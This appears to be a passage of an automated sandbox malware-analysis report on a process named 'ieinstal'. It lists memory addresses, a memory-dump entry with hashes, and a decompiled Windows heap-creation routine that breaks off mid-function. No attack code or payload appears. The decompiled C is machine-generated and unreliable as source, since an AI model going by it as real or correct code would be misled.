                                                                                                                0x1e66804a
                                                                                                                0x1e66804d
                                                                                                                0x1e6680ec
                                                                                                                0x1e6680ec
                                                                                                                0x1e6680f1
                                                                                                                0x1e6680fe
                                                                                                                0x1e668101
                                                                                                                0x1e668104
                                                                                                                0x1e66810d
                                                                                                                0x1e66810f
                                                                                                                0x1e668114
                                                                                                                0x1e668114
                                                                                                                0x1e668116
                                                                                                                0x1e668119
                                                                                                                0x1e668119
                                                                                                                0x1e66811f
                                                                                                                0x1e668125
                                                                                                                0x1e668127
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e668129
                                                                                                                0x1e66812b
                                                                                                                0x1e668135
                                                                                                                0x1e668137
                                                                                                                0x1e6681ad
                                                                                                                0x1e6681b0
                                                                                                                0x1e6681b0
                                                                                                                0x1e6681b2
                                                                                                                0x1e6681b5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e66812d
                                                                                                                0x1e66812d
                                                                                                                0x1e668130
                                                                                                                0x1e668132
                                                                                                                0x00000000
                                                                                                                0x1e668132
                                                                                                                0x00000000
                                                                                                                0x1e66812b
                                                                                                                0x1e668139
                                                                                                                0x1e66813c
                                                                                                                0x1e668165
                                                                                                                0x1e668168
                                                                                                                0x1e66816a
                                                                                                                0x1e668182
                                                                                                                0x1e668182
                                                                                                                0x1e66816c
                                                                                                                0x1e668173
                                                                                                                0x1e668173
                                                                                                                0x1e66813e
                                                                                                                0x1e66813e
                                                                                                                0x1e668141
                                                                                                                0x1e668143
                                                                                                                0x1e66815b
                                                                                                                0x1e668145
                                                                                                                0x1e668145
                                                                                                                0x1e668145
                                                                                                                0x1e668143
                                                                                                                0x1e668188
                                                                                                                0x1e66818a
                                                                                                                0x1e668190
                                                                                                                0x1e668193
                                                                                                                0x1e668197
                                                                                                                0x1e668199
                                                                                                                0x1e668199
                                                                                                                0x1e668199
                                                                                                                0x1e66819e
                                                                                                                0x1e668053
                                                                                                                0x1e668057
                                                                                                                0x1e66805a
                                                                                                                0x00000000
                                                                                                                0x1e668060
                                                                                                                0x1e668060
                                                                                                                0x1e668063
                                                                                                                0x1e668067
                                                                                                                0x1e668069
                                                                                                                0x1e668069
                                                                                                                0x1e668069
                                                                                                                0x1e66806e
                                                                                                                0x1e668071
                                                                                                                0x1e668071
                                                                                                                0x1e668074
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e668076
                                                                                                                0x1e668079
                                                                                                                0x1e66807f
                                                                                                                0x1e668083
                                                                                                                0x1e668085
                                                                                                                0x1e668088
                                                                                                                0x1e66808b
                                                                                                                0x1e6680a4
                                                                                                                0x1e6680a6
                                                                                                                0x1e6680b9
                                                                                                                0x1e6680be
                                                                                                                0x1e6680be
                                                                                                                0x1e6680a6
                                                                                                                0x1e6680c7
                                                                                                                0x1e6680c9
                                                                                                                0x1e6680cf
                                                                                                                0x1e6680d1
                                                                                                                0x1e6680dd
                                                                                                                0x00000000
                                                                                                                0x1e6680d3
                                                                                                                0x1e6680d3
                                                                                                                0x1e6680d5
                                                                                                                0x1e6680d5
                                                                                                                0x00000000
                                                                                                                0x1e6680d1
                                                                                                                0x1e6680e1
                                                                                                                0x1e6680e4
                                                                                                                0x1e6680e4
                                                                                                                0x1e66805a
                                                                                                                0x1e668040
                                                                                                                0x1e668043
                                                                                                                0x1e668043
                                                                                                                0x1e667fd2
                                                                                                                0x1e667fd2
                                                                                                                0x1e667fd2
                                                                                                                0x1e667f6a
                                                                                                                0x1e667f6a
                                                                                                                0x1e667f6a
                                                                                                                0x1e6681a1
                                                                                                                0x1e6681a1
                                                                                                                0x1e6681a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6681a5
                                                                                                                0x00000000
                                                                                                                0x1e6681a5
                                                                                                                0x1e667f2c
                                                                                                                0x1e667f32
                                                                                                                0x00000000
                                                                                                                0x1e667f32
                                                                                                                0x1e6681c9
                                                                                                                0x1e6681c9
                                                                                                                0x1e6681d0
                                                                                                                0x1e6681d0
                                                                                                                0x1e6681d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6681d4
                                                                                                                0x1e6681d8
                                                                                                                0x1e6681f3
                                                                                                                0x1e6681da
                                                                                                                0x1e6681da
                                                                                                                0x1e6681dd
                                                                                                                0x1e6681e3
                                                                                                                0x1e6681e6
                                                                                                                0x1e6681e8
                                                                                                                0x1e6681eb
                                                                                                                0x1e6681eb
                                                                                                                0x1e6681e6
                                                                                                                0x1e6681f7
                                                                                                                0x1e668201
                                                                                                                0x1e668203
                                                                                                                0x1e668205
                                                                                                                0x1e668207
                                                                                                                0x00000000
                                                                                                                0x1e668207
                                                                                                                0x00000000
                                                                                                                0x1e668203
                                                                                                                0x1e66820f
                                                                                                                0x1e66820f
                                                                                                                0x1e668212
                                                                                                                0x1e668215
                                                                                                                0x1e668217
                                                                                                                0x1e668219
                                                                                                                0x1e66822d
                                                                                                                0x1e668232
                                                                                                                0x1e66821b
                                                                                                                0x1e66821b
                                                                                                                0x1e66821d
                                                                                                                0x1e668220
                                                                                                                0x1e668222
                                                                                                                0x1e668222
                                                                                                                0x1e66823a
                                                                                                                0x1e66823d
                                                                                                                0x1e668243
                                                                                                                0x1e668246
                                                                                                                0x1e668248
                                                                                                                0x1e66824e
                                                                                                                0x1e668251
                                                                                                                0x1e668254
                                                                                                                0x1e668254
                                                                                                                0x1e668257
                                                                                                                0x1e668259
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e668265
                                                                                                                0x1e668267
                                                                                                                0x1e668269
                                                                                                                0x1e66834d
                                                                                                                0x1e66834f
                                                                                                                0x00000000
                                                                                                                0x1e66826f
                                                                                                                0x1e66826f
                                                                                                                0x1e668272
                                                                                                                0x1e668272
                                                                                                                0x1e668278
                                                                                                                0x1e66827a
                                                                                                                0x1e66827d
                                                                                                                0x1e668280
                                                                                                                0x1e668284
                                                                                                                0x1e668287
                                                                                                                0x1e668289
                                                                                                                0x1e668289
                                                                                                                0x1e66828b
                                                                                                                0x1e668291
                                                                                                                0x1e66829d
                                                                                                                0x1e6682a4
                                                                                                                0x1e6682a6
                                                                                                                0x1e6682a9
                                                                                                                0x1e6682ab
                                                                                                                0x1e6682ab
                                                                                                                0x1e6682ab
                                                                                                                0x1e6682ab
                                                                                                                0x1e6682ae
                                                                                                                0x1e6682b1
                                                                                                                0x1e6682b3
                                                                                                                0x1e668319
                                                                                                                0x1e66831c
                                                                                                                0x1e668322
                                                                                                                0x1e6682b5
                                                                                                                0x1e6682b5
                                                                                                                0x1e6682b8
                                                                                                                0x1e6682bb
                                                                                                                0x1e6682bd
                                                                                                                0x1e6682c3
                                                                                                                0x1e6682c7
                                                                                                                0x1e6682c9
                                                                                                                0x1e6682cc
                                                                                                                0x1e6682cf
                                                                                                                0x1e6682e8
                                                                                                                0x1e6682ea
                                                                                                                0x1e6682fc
                                                                                                                0x1e668301
                                                                                                                0x1e668301
                                                                                                                0x1e668304
                                                                                                                0x1e668304
                                                                                                                0x1e66830d
                                                                                                                0x1e66830f
                                                                                                                0x1e668315
                                                                                                                0x1e668317
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e668317
                                                                                                                0x1e668325
                                                                                                                0x1e668329
                                                                                                                0x1e668345
                                                                                                                0x1e668345
                                                                                                                0x00000000
                                                                                                                0x1e668329
                                                                                                                0x1e66825b
                                                                                                                0x1e668261
                                                                                                                0x00000000
                                                                                                                0x1e668261
                                                                                                                0x1e668248
                                                                                                                0x00000000
                                                                                                                0x1e667c5c
                                                                                                                0x1e667c5c
                                                                                                                0x1e667c5f
                                                                                                                0x1e667c62
                                                                                                                0x1e667c65
                                                                                                                0x1e667c68
                                                                                                                0x1e667e20
                                                                                                                0x1e667e24
                                                                                                                0x1e667c6e
                                                                                                                0x1e667c6e
                                                                                                                0x1e667c6e
                                                                                                                0x00000000
                                                                                                                0x1e667c68
                                                                                                                0x1e667c56
                                                                                                                0x1e667bf8
                                                                                                                0x1e667c06
                                                                                                                0x1e667c06
                                                                                                                0x1e6674ce
                                                                                                                0x1e6674d2
                                                                                                                0x1e6674d7
                                                                                                                0x1e6674d9
                                                                                                                0x00000000
                                                                                                                0x1e6674db
                                                                                                                0x1e6674e5
                                                                                                                0x1e667556
                                                                                                                0x1e667556
                                                                                                                0x1e667560
                                                                                                                0x1e66756a
                                                                                                                0x1e667571
                                                                                                                0x1e667581
                                                                                                                0x1e667581
                                                                                                                0x1e6674d9
                                                                                                                0x1e6674cc
                                                                                                                0x1e667386
                                                                                                                0x1e66737e
                                                                                                                0x1e66733d
                                                                                                                0x1e667333
                                                                                                                0x1e667167
                                                                                                                0x1e66716d
                                                                                                                0x1e667174
                                                                                                                0x1e6671d3
                                                                                                                0x1e6671d3
                                                                                                                0x1e6671d3
                                                                                                                0x1e6671d9
                                                                                                                0x1e6671d9
                                                                                                                0x1e6671dd
                                                                                                                0x1e6671e1
                                                                                                                0x1e6671e8
                                                                                                                0x1e6671ea
                                                                                                                0x1e6671ec
                                                                                                                0x1e6671ec
                                                                                                                0x1e6671f1
                                                                                                                0x00000000
                                                                                                                0x1e667176
                                                                                                                0x1e667176
                                                                                                                0x1e66717c
                                                                                                                0x1e6671b0
                                                                                                                0x1e6671c0
                                                                                                                0x1e6671ca
                                                                                                                0x1e6671cc
                                                                                                                0x00000000
                                                                                                                0x1e66717e
                                                                                                                0x1e66717e
                                                                                                                0x1e667187
                                                                                                                0x1e667191
                                                                                                                0x1e667198
                                                                                                                0x1e6671a8
                                                                                                                0x1e6671a8
                                                                                                                0x1e66717c
                                                                                                                0x1e667174
                                                                                                                0x1e668c4a
                                                                                                                0x1e668c4a
                                                                                                                0x1e668c51
                                                                                                                0x1e668c5d
                                                                                                                0x1e668c97
                                                                                                                0x1e668c5f
                                                                                                                0x1e668c68
                                                                                                                0x1e668c68
                                                                                                                0x1e668c9f
                                                                                                                0x1e668ca7
                                                                                                                0x1e668cac
                                                                                                                0x1e668cbb
                                                                                                                0x1e668cbb
                                                                                                                0x1e668cac
                                                                                                                0x1e668cc6
                                                                                                                0x1e668cd4
                                                                                                                0x1e668cd4
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                • API String ID: 0-3178619729
                                                                                                                • Opcode ID: 80b4df6ed7e2135e993c585651122c43daccb5991eb61af1f4afeddd5cbdaa77
                                                                                                                • Instruction ID: 47c1ad9973640d3a00ed9bf21aced049161ace4a4b1ea33e415162cdd2bb959a
                                                                                                                • Opcode Fuzzy Hash: 80b4df6ed7e2135e993c585651122c43daccb5991eb61af1f4afeddd5cbdaa77
                                                                                                                • Instruction Fuzzy Hash: D9139EB4A10296CFDB14CF69C4907A9FBF2FF49304F5486A9D849AB385E734A941CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E660F90 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E1E660F90(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t415;
				signed int _t419;
				void* _t420;
				void* _t424;
				void* _t427;
				void _t435;
				signed int _t438;
				intOrPtr _t440;
				void* _t442;
				void* _t443;
				signed int _t444;
				void* _t447;
				unsigned int _t453;
				intOrPtr* _t473;
				intOrPtr* _t475;
				intOrPtr* _t477;
				intOrPtr* _t479;
				void* _t505;
				void* _t507;
				signed int _t513;
				void* _t519;
				void* _t522;
				intOrPtr _t523;
				void* _t524;
				void* _t527;
				char* _t534;
				intOrPtr _t545;
				intOrPtr _t554;
				void* _t557;
				void* _t558;
				signed int _t559;
				void* _t562;
				signed int _t564;
				void* _t565;
				signed int _t570;
				signed int _t571;
				intOrPtr _t592;
				void* _t601;
				signed int _t602;
				void* _t605;
				unsigned int _t613;
				void* _t616;
				void* _t620;
				signed int _t626;
				intOrPtr _t627;
				void* _t630;
				void* _t631;
				signed int _t641;
				intOrPtr _t643;
				signed int _t658;
				void* _t666;
				signed int _t671;
				signed int _t672;
				signed int _t682;
				void* _t686;
				signed int _t691;
				signed char _t692;
				signed int _t693;
				void* _t701;
				void* _t702;
				signed char _t703;
				void* _t718;
				void* _t719;
				void* _t721;
				short _t723;
				void* _t724;
				signed int _t726;
				signed int _t727;
				void* _t741;
				void* _t742;
				intOrPtr* _t745;
				void* _t746;
				signed int _t747;
				signed int _t748;
				void* _t750;
				intOrPtr* _t758;
				void* _t759;
				void* _t761;
				void* _t764;
				intOrPtr _t768;
				void* _t769;
				void* _t774;

				_push(0x11c);
				_push(0x1e72c130);
				E1E6A7C40(__ebx, __edi, __esi);
				_t613 =  *(_t759 + 0x18);
				 *(_t759 - 0xb4) = _t613;
				_t691 =  *(_t759 + 8);
				 *(_t759 - 0xb0) = _t691;
				_t415 =  *(_t759 + 0xc);
				 *(_t759 - 0xb8) = _t415;
				 *(_t759 - 0xf4) = _t415;
				_t616 =  *(_t759 + 0x10);
				 *(_t759 - 0xc8) = _t616;
				_t741 =  *(_t759 + 0x14);
				 *(_t759 - 0xc0) = _t741;
				 *(_t759 - 0xe8) = _t613;
				_t718 =  *(_t759 + 0x1c);
				 *(_t759 - 0xd4) =  *( *[fs:0x30] + 0x68);
				 *(_t759 - 0xe4) = 0;
				 *(_t759 - 0xac) = 0;
				 *(_t759 - 0xd0) = 0;
				_t768 =  *0x1e74373c; // 0x0
				if(_t768 != 0) {
					__eflags =  *(_t759 - 0xb8);
					if( *(_t759 - 0xb8) != 0) {
						goto L1;
					}
					__eflags =  *(_t759 - 0xb4);
					if( *(_t759 - 0xb4) != 0) {
						goto L1;
					}
					_t758 =  *0x1e743754; // 0x0
					 *0x1e7491e0(_t691, 0, _t616, _t741, 0, _t718);
					 *_t758();
					_t742 = 0;
					__eflags = 0;
					if(0 != 0) {
						L82:
						_t719 =  *(_t759 - 0xb8);
						L83:
						_t693 =  *(_t759 - 0xb4);
						L84:
						_t419 =  *(_t759 - 0xd0);
						if(_t419 != 0) {
							__eflags = _t419 - _t693;
							if(_t419 != _t693) {
								E1E64FBD0(0, _t719, _t742, _t419);
							}
						}
						if( *(_t759 - 0xac) != 0) {
							__eflags = _t719;
							if(_t719 == 0) {
								 *(_t759 - 0xbc) = 0;
								E1E64FABA(_t759 - 0xac, _t759 - 0xbc, 0x8000);
							}
						}
						_t420 = _t742;
						L87:
						 *[fs:0x0] =  *((intOrPtr*)(_t759 - 0x10));
						return _t420;
					}
					__eflags = _t718 - 0xffffffff;
					if(_t718 != 0xffffffff) {
						L117:
						_t719 =  *(_t759 - 0xb8);
						L110:
						_t742 = 0;
						goto L83;
					}
					_t718 = 0;
					_t691 =  *(_t759 - 0xb0);
					_t616 =  *(_t759 - 0xc8);
					L2:
					_t692 = _t691 & 0xf1ffffff;
					 *(_t759 - 0xb0) = _t692;
					_t742 = 0;
					if((_t692 & 0x00000100) != 0) {
						__eflags = _t692 & 0x00000002;
						if((_t692 & 0x00000002) == 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb8);
						if( *(_t759 - 0xb8) != 0) {
							goto L82;
						}
						__eflags = _t616;
						if(_t616 != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xc0);
						if( *(_t759 - 0xc0) != 0) {
							goto L82;
						}
						__eflags =  *(_t759 - 0xb4);
						if( *(_t759 - 0xb4) != 0) {
							goto L82;
						}
						__eflags = _t718 - 0xffffffff;
						if(_t718 == 0xffffffff) {
							_t602 =  *0x1e743744; // 0x0
							asm("sbb eax, eax");
							_t718 = _t718 &  !( ~_t602);
							__eflags = _t718;
						}
						__eflags = _t718;
						if(_t718 == 0) {
							_t742 = _t759 - 0x4c;
							goto L4;
						} else {
							_t742 = _t718;
							_t601 = E1E710A68(_t718);
							__eflags = _t601;
							if(_t601 == 0) {
								goto L117;
							}
							_t692 =  *(_t759 - 0xb0);
							L4:
							_t424 = 2;
							L5:
							if(_t742 != 0) {
								__eflags = _t742 - _t759 - 0x4c;
								if(_t742 == _t759 - 0x4c) {
									_t723 = 0x30;
									E1E698F40(_t742, 0, _t723);
									_t435 = 2;
									 *_t742 = _t435;
									 *((short*)(_t742 + 2)) = _t723;
									 *((intOrPtr*)(_t742 + 0xc)) = 1;
									_t314 = _t742 + 0x10;
									 *_t314 =  *(_t742 + 0x10) | 0xffffffff;
									__eflags =  *_t314;
								}
								__eflags =  *(_t742 + 4) & 0x00000001;
								if(( *(_t742 + 4) & 0x00000001) == 0) {
									_t620 = E1E710A21(_t742);
									_t721 =  *(_t759 - 0xc8);
									_t427 =  *(_t759 - 0xc0);
									__eflags = _t721;
									if(_t721 == 0) {
										_t721 = _t427;
									}
									__eflags = _t427 - _t721;
									if(_t427 > _t721) {
										_t427 = _t721;
									}
									_t742 = E1E718BBE(E1E6FD85E(_t427,  *(_t759 - 0xb0),  *(_t759 - 0xd4)), _t721, _t427, _t620, _t692);
									__eflags = _t742;
									if(_t742 != 0) {
										E1E64918A(_t742, 0, 1, 0);
										__eflags =  *(_t742 + 0x14);
										if( *(_t742 + 0x14) == 0) {
											E1E718E26(_t742);
											_t742 = 0;
										}
									}
									goto L82;
								} else {
									__eflags =  *0x1e743744; // 0x0
									if(__eflags == 0) {
										goto L117;
									}
									_t719 =  *(_t759 - 0xb8);
									_t745 =  *0x1e743754; // 0x0
									 *0x1e7491e0( *(_t759 - 0xb0), _t719,  *(_t759 - 0xc8),  *(_t759 - 0xc0), 0, 0);
									_t742 =  *_t745();
									goto L83;
								}
							}
							if((_t692 & 0x10000000) != 0) {
								L9:
								_t746 = 0x30;
								E1E698F40(_t759 - 0xa8, 0, _t746);
								_t764 = _t761 + 0xc;
								if(_t718 != 0) {
									 *((intOrPtr*)(_t759 - 4)) = 0;
									__eflags =  *_t718 - _t746;
									if( *_t718 == _t746) {
										_t682 = 0xc;
										memcpy(_t759 - 0xa8, _t718, _t682 << 2);
										_t764 = _t764 + 0xc;
									}
									 *((intOrPtr*)(_t759 - 4)) = 0xfffffffe;
								}
								_t626 =  *(_t759 - 0xd4);
								_t438 =  *(_t759 - 0xb0);
								if((_t626 & 0x00000010) != 0) {
									_t438 = _t438 | 0x00000020;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000020) != 0) {
									_t438 = _t438 | 0x00000040;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00200000) != 0) {
									_t438 = _t438 | 0x00000080;
									 *(_t759 - 0xb0) = _t438;
								}
								if((_t626 & 0x00000040) != 0) {
									_t438 = _t438 | 0x40000000;
									 *(_t759 - 0xb0) = _t438;
								}
								if((0x00000080 & _t626) != 0) {
									_t438 = _t438 | 0x20000000;
									 *(_t759 - 0xb0) = _t438;
								}
								_t699 = 0x1000;
								if((0x00001000 & _t626) != 0) {
									 *(_t759 - 0xb0) = _t438 | 0x08000000;
								}
								_t627 =  *[fs:0x30];
								if( *((intOrPtr*)(_t759 - 0xa4)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa4)) =  *((intOrPtr*)(_t627 + 0x78));
								}
								if( *((intOrPtr*)(_t759 - 0xa0)) == 0) {
									 *((intOrPtr*)(_t759 - 0xa0)) =  *((intOrPtr*)(_t627 + 0x7c));
								}
								if( *(_t759 - 0x9c) == 0) {
									 *(_t759 - 0x9c) =  *(_t627 + 0x84);
								}
								if( *(_t759 - 0x98) == 0) {
									 *(_t759 - 0x98) =  *(_t627 + 0x80);
								}
								_t440 =  *0x1e74693c; // 0x7ffeffff
								if(_t440 == 0) {
									 *0x1e746940 = 0x10000;
									_push(0);
									_push(0x2c);
									_push(_t759 - 0x78);
									_push(0);
									_t442 = E1E692D10();
									__eflags = _t442;
									if(_t442 < 0) {
										goto L117;
									}
									_t440 =  *((intOrPtr*)(_t759 - 0x58));
									 *0x1e74693c = _t440;
									_t699 = 0x1000;
								}
								if( *((intOrPtr*)(_t759 - 0x94)) == 0) {
									 *((intOrPtr*)(_t759 - 0x94)) = _t440 -  *0x1e746940 - _t699;
								}
								if( *((intOrPtr*)(_t759 - 0x90)) != 0) {
									__eflags =  *((intOrPtr*)(_t759 - 0x90)) - 0x7f000;
									if( *((intOrPtr*)(_t759 - 0x90)) <= 0x7f000) {
										L29:
										_t443 =  *(_t759 - 0xc0);
										if(_t443 != 0) {
											_t699 = _t443 + 0x00000fff & 0xfffff000;
										}
										 *(_t759 - 0xc4) = _t699;
										_t724 =  *(_t759 - 0xc8);
										if(_t724 != 0) {
											_t629 = _t724 + 0x00000fff & 0xfffff000;
										} else {
											_t62 = _t699 + 0xffff; // 0x10fff
											_t629 = _t62 & 0xffff0000;
										}
										 *(_t759 - 0xbc) = _t629;
										_t747 = _t699;
										if(_t699 > _t629) {
											_t699 = _t629;
											 *(_t759 - 0xc4) = _t629;
											_t747 = _t629;
										}
										_t444 =  *(_t759 - 0xb0);
										_t719 =  *(_t759 - 0xb8);
										if((_t444 & 0x00000002) == 0 || _t719 != 0) {
											 *(_t759 - 0xd4) = 0;
										} else {
											 *(_t759 - 0xd4) = 0x1000;
											 *(_t759 - 0xe4) = 2;
											_t70 = _t629 - 0x1000; // 0xffff
											_t444 =  *(_t759 - 0xb0);
											if(_t70 < _t747) {
												_t629 = _t629 + 0x00010fff & 0xffff0000;
												 *(_t759 - 0xbc) = _t629;
											}
										}
										if(_t747 == 0 || _t629 == 0) {
											goto L110;
										} else {
											if((_t444 & 0x61000000) != 0) {
												__eflags = _t444 & 0x10000000;
												if((_t444 & 0x10000000) != 0) {
													goto L39;
												}
												_t420 = E1E6FF51B(_t444, _t719, _t629, _t699,  *(_t759 - 0xb4), _t759 - 0xa8);
												goto L87;
											}
											L39:
											 *(_t759 - 0xc8) = 0x258;
											_t693 =  *(_t759 - 0xb4);
											if((_t444 & 0x00000001) != 0) {
												__eflags = _t693;
												if(_t693 == 0) {
													L42:
													if(_t719 != 0) {
														__eflags =  *(_t759 - 0x84);
														if( *(_t759 - 0x84) != 0) {
															_t701 =  *(_t759 - 0x8c);
															__eflags = _t701;
															if(_t701 == 0) {
																goto L110;
															}
															_t630 =  *(_t759 - 0x88);
															__eflags = _t630;
															if(_t630 == 0) {
																goto L110;
															}
															__eflags = _t701 - _t630;
															if(_t701 > _t630) {
																goto L110;
															}
															__eflags = _t444 & 0x00000002;
															if((_t444 & 0x00000002) != 0) {
																goto L110;
															}
															 *(_t759 - 0xcc) = _t719;
															 *(_t759 - 0xc0) = _t719 + _t701;
															 *(_t759 - 0xbc) = _t630;
															E1E698F40(_t719, 0, 0x1000);
															_t764 = _t764 + 0xc;
															L108:
															_t748 =  *(_t759 - 0xb0);
															L100:
															 *(_t759 - 0xe4) =  *(_t759 - 0xe4) | 0x00000001;
															_t702 = _t719;
															 *(_t759 - 0xac) = _t702;
															_t726 = _t748 & 0x00040000;
															_t631 =  *(_t759 - 0xc0);
															_t447 =  *(_t759 - 0xcc);
															L49:
															if(_t447 != _t631) {
																L55:
																_t727 = _t702 + 0x258;
																if(( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
																	 *( *(_t759 - 0xac) + 0xbc) = _t727 + 0x00000007 & 0xfffffff8;
																	 *(_t759 - 0xc8) =  *(_t759 - 0xc8) + 0x60c;
																	_t727 =  *( *(_t759 - 0xac) + 0xbc) + 0x60c;
																	 *(_t759 - 0xb0) =  *(_t759 - 0xb0) | 0x04000000;
																	_t748 =  *(_t759 - 0xb0);
																}
																_t453 =  *(_t759 - 0xc8) + 0x00000007 & 0xfffffff8;
																 *(_t759 - 0xe8) = _t453;
																 *( *(_t759 - 0xac)) = _t453 >> 3;
																 *((char*)( *(_t759 - 0xac) + 2)) = 1;
																 *((char*)( *(_t759 - 0xac) + 7)) = 1;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x60)) = 0xeeffeeff;
																 *( *(_t759 - 0xac) + 0x40) = _t748 & 0xefffffff;
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x58)) = 0;
																E1E698F40( *(_t759 - 0xac) + 0x1f4, 0, 0x5c);
																E1E6522E1( *(_t759 - 0xac));
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x234)) = 1;
																_t750 =  *(_t759 - 0xac);
																if(( *(_t750 + 0x40) & 0x08000000) != 0) {
																	 *(_t750 + 0x58) = E1E70D8FD(0x1e70fd00) & 0x0000ffff;
																	 *( *(_t759 - 0xac) + 0x40) =  *( *(_t759 - 0xac) + 0x40) & 0xffffffbf;
																	_t750 =  *(_t759 - 0xac);
																}
																_t703 =  *(_t759 - 0xb0);
																 *(_t750 + 0x44) = _t703 & 0x6001007d;
																 *((short*)( *(_t759 - 0xac) + 0x7e)) = _t727 -  *(_t759 - 0xac);
																 *((intOrPtr*)( *(_t759 - 0xac) + 0x80)) = 0;
																_t473 =  *(_t759 - 0xac) + 0xc0;
																 *((intOrPtr*)(_t473 + 4)) = _t473;
																 *_t473 = _t473;
																_t475 =  *(_t759 - 0xac) + 0x9c;
																 *((intOrPtr*)(_t475 + 4)) = _t475;
																 *_t475 = _t475;
																_t477 =  *(_t759 - 0xac) + 0xa4;
																 *((intOrPtr*)(_t477 + 4)) = _t477;
																 *_t477 = _t477;
																_t479 =  *(_t759 - 0xac) + 0x8c;
																 *((intOrPtr*)(_t479 + 4)) = _t479;
																 *_t479 = _t479;
																_t641 =  *(_t759 - 0xd0);
																if(_t641 != 0 || (_t703 & 0x00000001) != 0) {
																	L61:
																	 *( *(_t759 - 0xac) + 0xc8) = _t641;
																	 *( *(_t759 - 0xac) + 0x48) =  *( *(_t759 - 0xac) + 0x48) | 0x80000000;
																	if(E1E681EED( *(_t759 - 0xac),  *(_t759 - 0xac),  *(_t759 - 0xe8) + 0x238, _t641,  *(_t759 - 0xe4),  *(_t759 - 0xcc),  *(_t759 - 0xc0),  *(_t759 - 0xcc) -  *(_t759 - 0xd4) +  *(_t759 - 0xbc)) == 0) {
																		goto L117;
																	}
																	if( *(_t759 - 0xb8) != 0) {
																		E1E698F40(_t727, 0, 0x80);
																	}
																	 *((intOrPtr*)(_t727 + 4)) = 0x80;
																	_t643 = _t727 + 0x24;
																	 *((intOrPtr*)(_t727 + 0x1c)) = _t643;
																	 *(_t727 + 0x18) =  *(_t759 - 0xac) + 0xc0;
																	 *((intOrPtr*)(_t727 + 0x20)) = _t643 + 0x10;
																	E1E651A24( *(_t759 - 0xac), _t727);
																	 *((short*)( *(_t759 - 0xac) + 0x7c)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x64)) =  *((intOrPtr*)(_t759 - 0xa4));
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x68)) =  *((intOrPtr*)(_t759 - 0xa0));
																	 *( *(_t759 - 0xac) + 0x6c) =  *(_t759 - 0x9c) >> 3;
																	 *( *(_t759 - 0xac) + 0x70) =  *(_t759 - 0x98) >> 3;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x78)) =  *((intOrPtr*)(_t759 - 0x94));
																	 *( *(_t759 - 0xac) + 0x5c) =  *((intOrPtr*)(_t759 - 0x90)) + 7 >> 3;
																	 *( *(_t759 - 0xac) + 0xcc) =  *(_t759 - 0x84) ^  *0x1e746d48;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x250)) = 4;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0x254)) = 0xfe000;
																	if(( *0x1e746934 & 1) != 0) {
																		 *( *(_t759 - 0xac) + 0x48) = 1;
																	}
																	_t658 =  *(_t759 - 0xb0);
																	_t505 =  *(_t759 - 0xac);
																	if((_t658 & 0x00010000) != 0) {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0x17;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff0;
																	} else {
																		 *((intOrPtr*)(_t505 + 0x94)) = 0xf;
																		 *((intOrPtr*)( *(_t759 - 0xac) + 0x98)) = 0xfffffff8;
																	}
																	_t507 =  *(_t759 - 0xac);
																	if(( *(_t507 + 0x40) & 0x00000020) != 0) {
																		 *((intOrPtr*)(_t507 + 0x94)) =  *((intOrPtr*)(_t507 + 0x94)) + 8;
																		_t507 =  *(_t759 - 0xac);
																	}
																	 *((intOrPtr*)(_t507 + 0xe4)) = 0;
																	 *((short*)( *(_t759 - 0xac) + 0xe8)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xea)) = 0;
																	 *((char*)( *(_t759 - 0xac) + 0xeb)) = 0;
																	 *((intOrPtr*)( *(_t759 - 0xac) + 0xb8)) = 0;
																	_t513 = _t658 & 0x00000003;
																	_t659 = _t658 & 0xffffff00 | _t513 == 0x00000002;
																	if(((_t513 & 0xffffff00 | ( *0x1e746934 & 1) == 0x00000000) & (_t658 & 0xffffff00 | _t513 == 0x00000002)) == 0) {
																		L70:
																		E1E65FED0(0x1e744800);
																		E1E68666D( *(_t759 - 0xac));
																		_push(0x1e744800);
																		E1E65E740( *(_t759 - 0xac));
																		if( *((intOrPtr*)( *(_t759 - 0xac) + 0x7c)) == 0) {
																			goto L117;
																		}
																		_t519 = E1E663C40();
